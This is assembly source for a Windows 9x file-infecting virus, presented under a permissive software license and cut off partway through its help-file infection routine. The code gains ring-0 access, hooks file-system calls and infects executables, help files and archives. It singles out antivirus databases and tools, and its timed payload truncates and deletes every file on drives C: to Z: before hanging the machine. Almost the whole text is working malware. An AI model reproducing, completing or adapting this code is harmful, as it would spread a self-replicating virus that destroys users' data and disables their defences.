ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.ASM]ÄÄÄ COMMENT / (C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED. THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / ; KNOWN UNFIXED BUGS: ; 1. INCORRECT PATCHED PAGE MAPPING IN SOME CASES FOR RESTORED NON-WRITEABLE ; CODE SECTION FROM R0 ; 2. DRWEB ALARM FOR PE EXECUTABLE (BUT FALSE ALARM TOO) MODEL TINY P386 LOCALS INCLUDE VBA.INC TOTAL GROUP CODE16,CODE32 ;====================================== CODE16 SEGMENT BYTE PUBLIC 'CODE' USE16 ASSUME CS:TOTAL,DS:TOTAL,ES:TOTAL,SS:TOTAL ORG 100H START: ;-------------------------------------- DOS2R0 PROC JMP DOS_INSTALL ;0EBH (OR 0E9H FOR PE_INSTALL) JMP_RELO DB 0,0,0 COPYRIGHT = $-START DB '(C) VBA Ltd. E-mail: support@vba.com.by',0 OFF_DOSINST = $-JMP_RELO DOS_INSTALL: MOV AH,4AH MOV BH,10H INT 21H JB GO2_DOS_EXIT MOV AX,160AH INT 2FH ;GET WIN VERSION AND AX,AX JNE GOZ_DOS_EXIT CMP BH,4 ;<4.X? 
JB GO2_DOS_EXIT MOV DX,OUR_PORT IN AL,DX CMP AL,WE_HERE STC JE GO2_DOS_EXIT MOV AL,0 ;0-PE,1-HLP,2-RAR,3-ZIP ;4-ARJ,5-HA FILE_TYPE = $-START-1 DEC AX JNE NO_DOS_SLEEP INT 1AH MOV BX,DX DOS_SLEEP: STI ;TIMEOUT FOR HLP (PREVENT HANG) XOR AH,AH INT 1AH SUB DX,BX CMP DX,(WAIT_TIME*18) JB DOS_SLEEP NO_DOS_SLEEP: CLD MOV AX,1687H INT 2FH ;DPMI PRESENT (0.9 IN WIN95/8)? AND AX,AX JNE GOZ_DOS_EXIT MOV BP,SP PUSH ES DI MOV BX,SI MOV AH,48H INT 21H ;MALLOC FOR INTERNAL USE BY DPMI HOST JB GO2_DOS_EXIT MOV ES,AX XOR AX,AX CALL 4 PTR [BP-4] ;GO OUT FROM V86 TO PM MODE GO2_DOS_EXIT: JB GO_DOS_EXIT CALL CALC_DOS_DELTA DOS_DELTA = $-START DB 'MS-DOS',0 CALC_DOS_DELTA: POP SI MOV AX,168AH INT 2FH ;GET EXTAPI AND AL,AL GOZ_DOS_EXIT: JNE DOS_EXIT PUSH ES DI DS POP ES MOV CX,1 CALL ALLOC_DESC PUSH AX CALL ALLOC_DESC MOV [BP-2],AX AND AL,NOT 7 PUSH AX MOV BX,CS LEA DI,ZERO_INIT-DOS_DELTA[SI] MOV AX,0BH CALL DPMICALL ;GET CS DESCRIPTOR MOV AX,100H CALL 4 PTR [BP-8] ;GET LDT ALIAS GO_DOS_EXIT: JB DOS_EXIT MOV ES,AX LEA AX,OFF_R0_INSTALL-DOS_DELTA[SI] ADD AX,[DI+2] MOV BL,[DI+4] MOV BH,[DI+7] ADC BX,0 POP DI STOSW ;GENERATE CALLGATE POP AX STOSW AND AL,NOT 7 PUSH AX MOV AX,11101100B SHL 8 ;P=1:DPL=3:S=0:TYPE=0CH (CALLGATE) STOSW XCHG AX,BX STOSW POP DI ;GENERATE R0 DESCRIPTOR MOV AX,-1 STOSW INC AX STOSW STOSB MOV AX,1100111110011010B ;G=1:32=1:AVL=0:LIMIT=0FH STOSW ;P=1:DPL=0:S=1:CODE:NCONF:READ=1:NOACCESS XOR AL,AL STOSB CALL 4 PTR [BP-4] ;SWITCH TO R0 DOS_EXIT: .EXIT ALLOC_DESC: XOR AX,AX DPMICALL: INT 31H JB DOS_EXIT RET ENDP INCLUDE SPE.ASI END_CODE16 = $-START ENDS ;====================================== CODE32 SEGMENT BYTE PUBLIC 'CODE' USE32 ASSUME CS:TOTAL,DS:TOTAL,ES:TOTAL,SS:TOTAL START_CODE32: ;------------------------------------------------ CALC_DELTA PROC CALL CALC_OUR_OFFST GOFF OUR_OFFST CALC_OUR_OFFST: POP EDX SUB EDX,LARGE OUR_OFFST RET ENDP ;------------------------------------------------ GOFF OFF_IFS_HOOKER ; INT FILESYSTEMAPIHOOKFUNCTION(PIFSFUNC FSDFNADDR,INT 
FUNCTIONNUM,INT DRIVE, ; INT RESOURCEFLAGS,INT CODEPAGE,PIOREQ PIR) IFS_HOOKER PROC FSD_FN_ADDR = 4 PTR [EBP+8] FN_NUM = 4 PTR [EBP+12] DRIVE = 4 PTR [EBP+16] RES_FLAGS = 4 PTR [EBP+20] CODE_PAGE = 4 PTR [EBP+24] P_IOREQ = 4 PTR [EBP+28] ENTERD STACK_FRAME,0 PUSHAD CALL CALC_DELTA MOV EBX,P_IOREQ BTS 4 PTR FLAG[EDX],0 JB IFS_EXIT CMP 1 PTR RES_FLAGS,IFSFH_RES_CFSD ;CHAR DEVICE? JE IFS_RETURN MOV EAX,FN_NUM CMP EAX,IFSFN_RENAME JA IFS_RETURN JE IS_RENAME CMP AL,IFSFN_OPEN JE IS_OPEN CMP AL,IFSFN_FILEATTRIB JE IS_ATTRIB GOFF IFS_RETURN_OFF IFS_RETURN: DEC 1 PTR FLAG[EDX] POPAD LEAVED JMP 4 PTR DS:[12345678H] GOFF OLD_IFS_HOOKER,4 IFS_EXIT: PUSH EBX LEA EDI,OLD_DATETIME[EDX] CALL FSD_FN_ADDR MOV [EBP-STACK_FRAME-4],EAX ;SET CORRECT RETURN VALUE POP EAX CMP 1 PTR FN_NUM,IFSFN_OPEN JNE NO_STORE_FDATE MOV EAX,[EBX.IR_DATETIME] STOSD NO_STORE_FDATE: POPAD LEAVED GOFF HOOK_STUB RET ENDP ;------------------------------------------------ IS_RENAME: TEST 1 PTR [EBX.IR_ATTR+3],FILE_FLAG_WILDCARDS SHR 24 JMP IS_ACCESS ;------------------------------------------------ IS_ATTRIB: MOV AL,[EBX.IR_FLAGS] DEC EAX ;SET_ATTRIBUTES JNE NO_SET_ATTRIB TEST 1 PTR [EBX.IR_ATTR],FA_SYSTEM JMP IS_ACCESS NO_SET_ATTRIB: CMP AL,SET_ATTRIB_CREATION_DATETIME-1 JA IFS_RETURN AND AL,1 JMP IS_ACCESS ;------------------------------------------------ IS_OPEN: TEST 1 PTR [EBX.IR_OPTIONS+1],(R0_SWAPPER_CALL OR OPEN_FLAGS_REOPEN) SHR 8 IS_ACCESS: JNE IFS_RETURN GO_PROCESS: BREAK PUSH EBX CMP DL,SHELL_FLAG[EDX] IFNDEF DEBUG JNE GO_NO_INF_SHELL ELSE JMP GO_NO_INF_SHELL ENDIF CALL GET_WININIT CALL GET_ATTRIBUTES JNB GO_NO_INF_SHELL LEA ESI,SYSTEM_INI[EDX] MOV CL,LEN_SYSTEM_INI CALL CONCAT_WINDIR PUSH EDX CALL OPEN_FILE_RO POP EDX JB GO_NO_INF_SHELL XCHG EAX,EBX CALL READ_FILE_BUFF_0 JNB LONG_SYSINI ADD ECX,EAX LONG_SYSINI: CALL CLOSE_FILE FIND_SHELL: LODSD OR EAX,20202020H CMP EAX,'lehs' JNE NO_SHELL LODSW OR AL,20H CMP AX,'=l' JE IS_SHELL DEC ESI DEC ESI NO_SHELL: SUB ESI,3 LOOP FIND_SHELL GO_NO_INF_SHELL: 
JMP NO_INF_SHELL IS_SHELL: CMP 1 PTR [ESI+1],':' JNE SNAME_ONLY LEA EDI,TMP_PATH[EDX] PUSH EDI COPY_SH_NAME: MOVSB CMP 1 PTR [ESI],20H JA COPY_SH_NAME MOV [EDI],DL POP ESI JMP OPEN_SHELL SNAME_ONLY: XOR ECX,ECX GET_SH_LIM: INC ECX CMP 1 PTR [ESI+ECX],20H JA GET_SH_LIM CALL CONCAT_WINDIR OPEN_SHELL: PUSH EDX CALL OPEN_FILE_RO POP EDX JB GO_NO_INF_SHELL XCHG EAX,EBX CALL GET_ATTRIBUTES PUSH EBX ECX EDX EBX DEC 1 PTR [EDI-1] MOV EDI,4 PTR OLD_DATETIME[EDX] CALL OPEN_CREATE POP EBX EDX JB CLOSE_SOURCE PUSH EDI ESI EAX CALL READ_FILE_BUFF_0 JB CLOSE_ALL XCHG EAX,EDI MOV AL,WE_HERE XCHG AL,1 PTR [ESI.DOSH_CSUM] CMP AL,WE_HERE JE CLOSE_ALL_CMC COPY_FILE: POP EBX PUSH EBX MOV EAX,EDI CALL WRITE_FILE JB CLOSE_ALL ADD EDI,ECX MOV EAX,EDI MOV EBX,[ESP+10H] CALL READ_FILE JNB COPY_FILE ADD ECX,EAX JNE COPY_FILE CLOSE_ALL_CMC: CMC CLOSE_ALL: POP EBX ESI CX DI PUSHFD CALL CLOSE_FILE MOV AL,SET_ATTRIB_MODIFY_DATETIME CALL MAN_ATTRIBUTES POPFD CLOSE_SOURCE: POP ECX SBB EDI,EDI JNE SH_ERR CALL SET_ATTRIBUTES JMP SH_OK SH_ERR: CALL DELETE_FILE SH_OK: POP EBX CALL CLOSE_FILE INC EDI STC JE GOC_NO_INF_SHELL MOV FILE_TYPE[EDX],DL CALL INFECTION LEA ESI,TMP_PATH[EDX] LEA EDI,MAIN_BUFF[EDX] PUSH EDI ESI MOV EAX,'ner[' STOSD MOV EAX,']ema' STOSD MOV AL,0AH STOSB MOVE_DEST: LODSB CMP AL,'A' JB NO_LETTER CMP AL,'Z' JA NO_LETTER OR AL,20H NO_LETTER: STOSB CMP DL,[ESI] JNE MOVE_DEST INC 1 PTR [EDI-1] MOV AL,'=' STOSB POP ESI MOVE_SOURCE: MOVSB CMP DL,[ESI] JNE MOVE_SOURCE MOV AL,0AH STOSB MOV EAX,'=lun' STOSD PUSH EDI CALL GET_WININIT POP EDI PUSH ESI MOVE_INIT: MOVSB CMP DL,[ESI] JNE MOVE_INIT POP ESI PUSH EDX CALL OPEN_CREATE POP EDX ECX GOC_NO_INF_SHELL: JB NO_INF_SHELL XCHG EAX,EBX SUB EDI,ECX MOV ESI,ECX MOV ECX,EDI XOR EAX,EAX CALL WRITE_FILE CALL CLOSE_FILE PUSH GET_CUR_VM_HANDLE CALL VXD_CALL MOV AL,MSG_POSSIBLITY CALL GET_RANDOM_BYTE IFNDEF DEBUG JNE NO_INF_SHELL ELSE XOR EAX,EAX ENDIF LEA ECX,COPYRIGHT[EDX] MOV ESI,EAX MOV EDI,EAX PUSH SHELL_MESSAGE CALL VXD_CALL NO_INF_SHELL: MOV 1 
PTR SHELL_FLAG[EDX],1 POP EBX SHELL_ALREADY: IFNDEF DEBUG LEA ESI,COMMAND_PIF[EDX] MOV CL,LEN_COMMAND_PIF CALL CONCAT_WINDIR CALL GET_ATTRIBUTES JB CPIF_NFOUND CALL DELETE_FILE CPIF_NFOUND: MOV EDI,ESI ELSE LEA EDI,TMP_PATH[EDX] MOV ESI,EDI ENDIF MOV EAX,DRIVE INC AL ;UNC PATH? JE NO_STORE_DRIVE ADD AX,(':' SHL 8) OR ('A'-2) STOSW NO_STORE_DRIVE: MOV EAX,[EBX.IR_PPATH] ADD EAX,4 PUSH EDX BCS_WANSI MAX_PATH-3 EAX EDI UNITOBCSPATH CALL VXD_CALL ADD ESP,4*4 POP EDX MOV [EDI+EAX],DL LEA ECX,FILE_TYPE[EDX] MOV 1 PTR [ECX],0FFH MOV EAX,[EDI+EAX-4] CMP EAX,'CVA.' ;AVP 3 DATABASE? JE INFECT_IT CMP EAX,'BDV.' ;DRWEB 4 DATABASE? JE INFECT_IT INC 1 PTR [ECX] CMP EAX,'EXE.' ;EXE? JE OK_FILE CMP EAX,'RCS.' JE OK_FILE CMP EAX,'LLD.' ;DLL? JE INFECT_IT ;FOR AV CORRECT CHECKING ONLY! INC 1 PTR [ECX] CMP EAX,'PLH.' ;HLP? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'RAR.' ;RAR? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'PIZ.' ;ZIP? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'JRA.' ;ARJ? JE OK_FILE INC 1 PTR [ECX] SHR EAX,8 CMP EAX,'AH.' ;HA? 
STC JNE GO_IFS_RETURN OK_FILE: PUSH EDX EBX MOV EDX,DRIVE TEST 1 PTR RES_FLAGS,IFSFH_RES_UNC JNE ERR_GET_SPACE MOV AX,R0_GETDISKFREESPACE CALL FILE_IO JB ERR_GET_SPACE MUL BX ;SEC_PER_CLUST(AX)*AVAIL_CLUST(CX) CMC JNB ERR_GET_SPACE CMP AX,SMALL (OUR_LEN+1FFH+0FFFH)/200H ERR_GET_SPACE: POP EBX EDX GO_IFS_RETURN: JB IFS_RETURN INFECT_IT: ;TMP_PATH->FILE PATH TO INFECTION LEA EAX,IFS_RETURN_OFF[EDX] PUSH EAX CALL GET_ATTRIBUTES JNB GOOD_ATT CMP 1 PTR FN_NUM,IFSFN_RENAME JE INF_ERR PUSH ESI MOV EDI,[EBX.IR_UPATH] XCHG ESI,EDI PARSE_PATH: LODSB INC ESI STOSB DEC AL JNS PARSE_PATH POP ESI ;-------------------------------------- INFECTION: CALL GET_ATTRIBUTES JB INF_ERR GOOD_ATT: TEST CL,FA_SYSTEM OR FA_DEVICE JE ATT_OK INF_ERR: RETN ATT_OK: MOV EDI,ECX CALL CLR_ATTRIBUTES JB INF_ERR PUSH EDI EDX MOV BL,OPEN_ACCESS_READWRITE OR OPEN_SHARE_DENYREADWRITE CALL OPEN_FILE POP EDX JB REST_ATTRIB PUSH ESI XCHG EAX,EBX MOV ECX,12345678H GOFF OLD_DATETIME,4 CMP 1 PTR FN_NUM,IFSFN_FILEATTRIB JNE CURRENT_DATE MOV EDI,P_IOREQ CMP 1 PTR [EDI.IR_FLAGS],SET_ATTRIB_MODIFY_DATETIME JNE CURRENT_DATE MOV ECX,[EDI.IR_DATETIME] CURRENT_DATE: PUSH ECX TEST 1 PTR FILE_TYPE[EDX],0FFH JS IS_SHITNAME JNE NO_SHITNAME MOV EDI,ESI GET_PATHBYTE: LODSB CMP AL,'\' JE STORE_OFFS CMP AL,':' JNE NO_STORE_OFFS STORE_OFFS: MOV EDI,ESI NO_STORE_OFFS: AND AL,AL JNE GET_PATHBYTE MOV EAX,[EDI] CMP EAX,'NIDA' ;ADINF? JE GO_TO_PAY CMP EAX,'IPVA' ;AVPI? JE GO_TO_PAY CMP EAX,'SOHG' ;GHOST32? JE GO_TO_PAY CMP EAX,'NIBV' ;VBINF? :-) JE GO_TO_PAY CMP EAX,'PVA_' ;AVP? JE IS_SHITNAME SHL EAX,8 CMP EAX,'RAJ' SHL 8 ;JAR? JE SKIP_FILE CMP EAX,'PVA' SHL 8 ;AVP? JE IS_SHITNAME CMP EAX,'WRD' SHL 8 ;DRWEB? JE IS_SHITNAME CMP EAX,'ABV' SHL 8 ;VBA*.EXE? 
:-) JNE NO_SHITNAME CMP 1 PTR [ESI-2],'E' JNE NO_SHITNAME IS_SHITNAME: XCHG EAX,ECX XOR ECX,ECX SHLD ECX,EAX,11 AND ECX,00001111B SHR EAX,16+5+4 SUB AL,HAPPY_YEAR-1980 JB SKIP_FILE MOV AH,12 ;MONTHS IN YEAR MUL AH IF HAPPY_MONTH EQ 1 DEC EAX ELSEIF HAPPY_MONTH EQ 2 DEC EAX DEC EAX ELSE SUB EAX,HAPPY_MONTH ENDIF ADD ECX,EAX JS SKIP_FILE MOV EAX,HAPPY_POSSIBLITY SUB EAX,ECX JA NOT_EXPIRED MOV AL,1 ;100% POSSIBLITY NOT_EXPIRED: CALL GET_RANDOM_BYTE GO_TO_PAY: JE TIME_TO_PAY SKIP_FILE: STC JMP GO_F_CLOSE NO_SHITNAME: PUSH EDX GET_DOSTIME CALL VXD_CALL POP EDX SUB EAX,[ESP] CMP EAX,0FFFFFH ;MIN - TWO WEEK AGE IFNDEF DEBUG JB F_CLOSE ENDIF CALL GET_SYS_TIME CMP DL,SHELL_FLAG[EDX] JE NO_SLEEP SUB EAX,12345678H GOFF INF_TIME,4 CMP EAX,SLEEP_TIME*60*1000 IFNDEF DEBUG JB F_CLOSE ENDIF NO_SLEEP: LEA ESI,HEADER[EDX] PUSH SIZE DOS_HEADER POP ECX XOR EAX,EAX ;POS IN FILE CALL READ_FILE ;READ FILE HEADER GO_F_CLOSE: JB F_CLOSE LEA EDI,OUR_LOCAL_HEADER[EDX] MOV CL,(SIZE_ARC_AREA+3)/4 REP STOSD MOV AL,1 PTR FILE_TYPE[EDX] MOVZX EDI,2 PTR INF_PROCS[EDX+EAX*2] ADD EDI,EDX MOV 2 PTR [EDX],(OFF_DOSINST SHL 8) OR 0EBH ;DROPPER MODE CALL EDI F_CLOSE: CALL CLOSE_FILE POP CX DI ESI MOV AL,SET_ATTRIB_MODIFY_DATETIME CALL MAN_ATTRIBUTES REST_ATTRIB: POP ECX JMP SET_ATTRIBUTES ;------------------------------------------------ TIME_TO_PAY: MOV EAX,_LEAVEMUSTCOMPLETE PUSH EAX DEC EAX ;_ENTERMUSTCOMPLETE PUSH EAX CALL VXD_CALL LEA EDX,FIND_DATA[EDX] ;ESI=&TMP_PATH IFNDEF DEBUG MOV AX,':C' ELSE MOV AX,':X' ENDIF FIND_DRIVE: MOV EDI,ESI STOSW PUSH EAX FIND_FIRST: MOV AL,'\' STOSB MOV 2 PTR [EDI],'*' PUSH 37H POP ECX MOV AX,R0_FINDFIRSTFILE CALL FILE_IO JNB SOME_FOUND FIND_SLASH: DEC EDI CMP 1 PTR [EDI-1],':' JE NEXT_DRIVE CMP 1 PTR [EDI-1],'\' JNE FIND_SLASH FIND_NEXT: MOV AX,R0_FINDNEXTFILE CALL FILE_IO JNB OK_FOUND MOV AX,R0_FINDCLOSEFILE CALL FILE_IO POP EBX JMP FIND_SLASH SOME_FOUND: PUSH EBX XCHG EAX,EBX OK_FOUND: PUSH ESI EDI LEA ESI,[EDX.CFILENAME] STORE_NAME: LODSB STOSB AND AL,AL JNE 
STORE_NAME DEC EDI POP EAX ESI XCHG EAX,EDI TEST 1 PTR [EDX.DWFILEATTRIBUTES],10H JE NOT_DIR CMP 1 PTR [EDX.CFILENAME],'.' JE FIND_NEXT XCHG EAX,EDI JMP FIND_FIRST NEXT_DRIVE: POP EAX INC EAX CMP AL,'Z' JBE FIND_DRIVE GO_HANG: CALL VXD_CALL ;_LEAVEMUSTCOMPLETE XOR ESI,ESI LEA EAX,[ESI+1] ;HANG_ON_EXIT PUSH FATAL_ERROR_HANDLER JMP GO_HANG NOT_DIR: PUSHAD CALL CLR_ATTRIBUTES CALL OPEN_CREATE JB DEL_FILE XCHG EAX,EBX CALL CLOSE_FILE DEL_FILE: CALL DELETE_FILE POPAD JMP FIND_NEXT ;------------------------------------------------ ;ENTRY: EBP=&LENGTH OF MACRO STRING CORR_LENGTH PROC MOV EAX,EDI SUB EAX,EBP DEC EAX MOV [EBP],AX XOR AL,AL STOSB INF_EXE_EXIT: RET ENDP ;------------------------------------------------ GOFF INF_EXE MOV 1 PTR [EDX],0E9H ;PE SPECIAL MODE IFDEF DEBUG CMP [DOSH_SIGNATURE.ESI],'MZ' ELSE CMP [DOSH_SIGNATURE.ESI],'ZM' ENDIF JNE INF_EXE_EXIT CMP [DOSH_LFARLC.ESI],3FH JBE INF_EXE_EXIT MOVZX EAX,[DOSH_LFANEW.ESI] ADD ESI,SIZE DOS_HEADER ;PHEADER MOV CX,SIZE PE_HEADER+(SIZE OBJECT_TABLE*MAX_OBJS) CALL READ_FILE JB INF_EXE_EXIT CMP 2 PTR [PEH_SIGNATURE.ESI],'EP' JNE INF_EXE_EXIT CMP [PEH_CPUTYPE.ESI],162H ;INTEL? 
JAE INF_EXE_EXIT CMP 1 PTR [PEH_NUMOFOBJECT.ESI],MAX_OBJS JA INF_EXE_EXIT TEST 2 PTR [PEH_FLAGS.ESI],PE_FLAG_DLL OR PE_FLAG_NOT_FIXUP JNE INF_EXE_EXIT TEST 2 PTR [PEH_FLAGS.ESI],PE_FLAG_32BIT OR PE_FLAG_EXECUTABLE JE INF_EXE_EXIT CMP 4 PTR [PEH_IMAGEBASE.ESI],400000H JNE INF_EXE_EXIT INC 1 PTR [PEH_FLAGS.ESI] ;PE_FLAG_NOT_FIXUP LEA EDI,[ESI+SIZE PE_HEADER-SIZE OBJECT_TABLE] XOR EAX,EAX MOV [PEH_FIXUP.SD_SIZE.ESI],EAX XCHG EAX,[PEH_FIXUP.SD_RVA.ESI] AND EAX,EAX GOZ_INF_EXIT: JE INF_EXE_EXIT PUSH EDI FIND_FIXUPOBJ: ADD EDI,SIZE OBJECT_TABLE CMP EAX,[OT_RVA.EDI] JNE FIND_FIXUPOBJ MOV AL,NOCHNG_SATT_PSBL CALL GET_RANDOM_BYTE JE NO_CHNG_ATT AND 1 PTR [OT_FLAGS.EDI+3],NOT ((OT_FLAG_DISCARDABLE OR OT_FLAG_SHARED) SHR 24) OR [OT_FLAGS.EDI],OT_FLAG_READ OR OT_FLAG_IDATA NO_CHNG_ATT: MOV AL,CHNG_SNAME_PSBL CALL GET_RANDOM_BYTE JNE NO_CHNG_NAME PUSH EDI CALL GEN_NAME XOR AL,AL STOSB POP EDI NO_CHNG_NAME: MOV AL,LEN_PEND_JUNK CALL GET_RANDOM_BYTE ADD AX,SMALL OUR_LEN+LEN_LOADER+3 AND AL,NOT 3 MOV CURRENT_LEN[EDX],EAX MOV COUNT_RET[EDX],AX XCHG EAX,ECX MOV EAX,[OT_VIRTSIZE.EDI] CALL CORR_SIZE CMP EAX,[OT_PHYSICALSIZE.EDI] JB GET_VIRTSIZE MOV EAX,[OT_PHYSICALSIZE.EDI] GET_VIRTSIZE: SUB EAX,ECX PUSHFD JA OK_RELOC_SIZE ADD EAX,ECX OK_RELOC_SIZE: CALL GET_RANDOM AND AL,NOT 3 PUSH EAX ADD EAX,[OT_PHYSICALOFF.EDI] MOV PHYS_BODY_OFF[EDX],EAX ADD EAX,ECX MOV FILL_SEC_OFF[EDX],EAX POP EAX ADD EAX,ECX PUSH EAX ADD EAX,[OT_RVA.EDI] ADD EAX,[PEH_IMAGEBASE.ESI] MOV OFF_FIXUP[EDX],EAX POP ECX POPFD JA MID_EXIT_ONE CMP [OT_PHYSICALSIZE.EDI],MIN_RELOC_SIZE JB MID_EXIT_ONE PUSH ESI CALL GETSIZE_FILE SUB EAX,[OT_PHYSICALOFF.EDI] CMP EAX,[OT_PHYSICALSIZE.EDI] JA MID_EXIT_CMC CALL CORR_SIZE_ECX CMPSD SCASD CALL CORR_SIZE_ECX SUB EAX,ECX CMP EAX,SIZE_MBUFF MID_EXIT_CMC: CMC JB MID_EXIT_TWO XCHG EAX,ECX PUSH ECX LEA EDI,MAIN_BUFF[EDX] MOV ESI,EDI XOR AL,AL REP STOSB POP ECX MOV EAX,12345678H GOFF FILL_SEC_OFF,4 CALL WRITE_FILE MID_EXIT_TWO: POP ESI MID_EXIT_ONE: POP EDI JNB NO_POP_EXIT MID_RET: RETN 
NO_POP_EXIT: MOV EAX,[PEH_CODEBASE.ESI] FIND_CODEOBJ: ADD EDI,SIZE OBJECT_TABLE CMP EAX,[OT_RVA.EDI] JNE FIND_CODEOBJ MOV AL,OT_FLAG_WRITE SHR 24 TEST AL,1 PTR [OT_FLAGS.EDI+3] JNE MID_RET PUSH EDI LEA ESI,TMP_PATH[EDX] MOV EDI,[ESI-SYS_PATH_DELTA] ;SYS_PATH[EDX] MOV CL,NOT RW_LOCAL_EXIT CHECK_PATH: CMPSB JNE NO_SYS_DIR CMP DL,[EDI] JNE CHECK_PATH XOR AL,AL MOV CL,AL NO_SYS_DIR: POP EDI OR 1 PTR [OT_FLAGS.EDI+3],AL MOV RW_OR_RO[EDX],CL PUSH EDX MOV EAX,[OT_PHYSICALSIZE.EDI] XOR EDX,EDX MOV ECX,SIZE_MBUFF DIV ECX POP EDX CALL GET_RANDOM IMUL EAX,ECX ADD EAX,[OT_PHYSICALOFF.EDI] PUSH EAX CALL READ_FILE_BUFF JB POP_INF_EXIT CMP DL,SHELL_FLAG[EDX] JE INF_ENTRYPOINT CALL FIND_PLACE AND ECX,ECX JNE MIDDLE_INSERT INF_ENTRYPOINT: POP EAX MOV EAX,PHEADER[PEH_ENTRYPOINT.EDX] PUSH EAX SUB EAX,[OT_RVA.EDI] ADD EAX,[OT_PHYSICALOFF.EDI] PUSH EAX CALL READ_FILE_BUFF POP EDI POP_INF_EXIT: POP EAX JB GO1_INF_EXIT PUSH EDI JMP ENTRY_INSERT MIDDLE_INSERT: MOV ESI,EAX SUB EAX,EDX SUB EAX,LARGE MAIN_BUFF ADD EAX,[OT_RVA.EDI] ADD EAX,[ESP] SUB EAX,[OT_PHYSICALOFF.EDI] ENTRY_INSERT: ADD EAX,PHEADER[PEH_IMAGEBASE.EDX] MOV INTRUD_OFF[EDX],EAX LEA EDI,OLD_PECODE[EDX] PUSH ESI XOR ECX,ECX MOV CL,LEN_LOADER REP MOVSB CALL SPE_THUNK POP EDI LEA ESI,SPE32_BUFF[EDX] REP MOVSB POP EAX LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF CALL WRITE_FILE GO1_INF_EXIT: JB INF_EXIT MOV EDI,ESI MOV ESI,EDX MOV ECX,12345678H GOFF CURRENT_LEN,4 PUSH ECX EDI REP MOVSB POP ESI ECX PUSH ECX EBX MOV EAX,12345678H GOFF MASK_CR,4 SHR ECX,1 GOFF LOOP_CR SHR ECX,1 ;NOP/NOP LOOP_CR_IMM: SUB EDI,4 ;SUB EDI,2 MOV EBX,[EDI] DB LEN_FILL_CRYPT DUP (90H) GOFF END_LOOP_CR DB 90H ;66H MOV [EDI],EBX LOOP LOOP_CR_IMM POP EBX ECX MOV EAX,12345678H GOFF PHYS_BODY_OFF,4 CALL WRITE_FILE LEA ESI,PHEADER[EDX] MOV AL,1 PTR [PEH_NUMOFOBJECT.ESI] IMUL EAX,SIZE OBJECT_TABLE ADD AX,SIZE PE_HEADER XCHG EAX,ECX MOV AX,[ESI.DOSH_LFANEW-SIZE DOS_HEADER] JMP SET_WRITE_FILE ;------------------------------------------------ CORR_SIZE_ECX: MOV EAX,ECX 
CORR_SIZE: PUSH EDX XOR EDX,EDX DIV [PEH_OBJALIGN.ESI] AND EDX,EDX JE NO_ALIGN INC EAX NO_ALIGN: MUL [PEH_OBJALIGN.ESI] POP EDX MOV [OT_VIRTSIZE.EDI],EAX RETN ;------------------------------------------------ MACRO_FNAME PROC PUSH ESI LEA ESI,RDROP_NAME[EDX] MOV EAX,'\\:C' STOSD SHR EAX,16 STOSW STORE_NLETT: MOVSB CMP 1 ptr [esi],'.' JNE STORE_NLETT MOV EAX,'PMT.' GOFF TEMP_EXT,3 STOSD POP ESI INF_EXIT: RET ENDP ;------------------------------------------------ GOFF INF_HLP DEC EAX ;EAX = 0 CALL GET_RANDOM LEA EDI,FIRST_DROP_MASK[EDX] STOSW SHR EAX,16 MOV RELO_MASK2[EDI-2],AX LODSD ;HLP_HEADER CMP EAX,HLP_MAGIC JNE INF_EXIT ;1. READ BEGIN OF HLP-DIRECTORY LODSD ;HLP_START_DIRECTORYSTART MOV EDI,ESI CMPSD ;LEA ESI,[ESI+SIZE HLP_START-8] CMPSD MOV CH,LEN_HLP_DIR SHR 8 ;CL=0 CALL READ_FILE JB INF_EXIT ;2. FIND "|SYSTEM" STRING AND GET OFFSET MOV AL,'|' FIND_SYSTEM: REPNE SCASB JNE INF_EXIT CMP 4 PTR [EDI],'TSYS' ;"|SYSTEM" BLOCK? JNE FIND_SYSTEM XCHG EAX,ECX MOV CL,SIZE FILE_HEADER+SIZE SYSTEM_HEADER MOV EAX,[ESI.HLP_START_ENTIREFILESIZE-SIZE HLP_START] XCHG EAX,[EDI+7] ;STORE NEW "SYSTEM" OFFSET ;3. READ SYSTEM PAGE (LENGTH READ BEFORE) LEA ESI,SYS_FILE_HEADER[EDX] LEA EDI,[EAX+ECX] ;OFFSET "SYSTEM" DATA CALL READ_FILE JB INF_EXIT CMP [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_MINOR],16 JBE INF_EXIT ;4. CHECK SECONDS IF FILE ALREADY INFECTED CMP AL,1 PTR [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_GENDATE] JE INF_EXIT MOV 1 PTR [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_GENDATE],AL ;5. GENERATE OUR MACROS PUSH EDI LEA EDI,[ESI+ECX] ;BUFF4MACRO CALL GEN_MACROS ;EXIT: EAX=MACROLENGTH ;6. CORRECT USED "SYSTEM" LENGTH ADD [ESI.FILE_HEADER_USEDSPACE],EAX 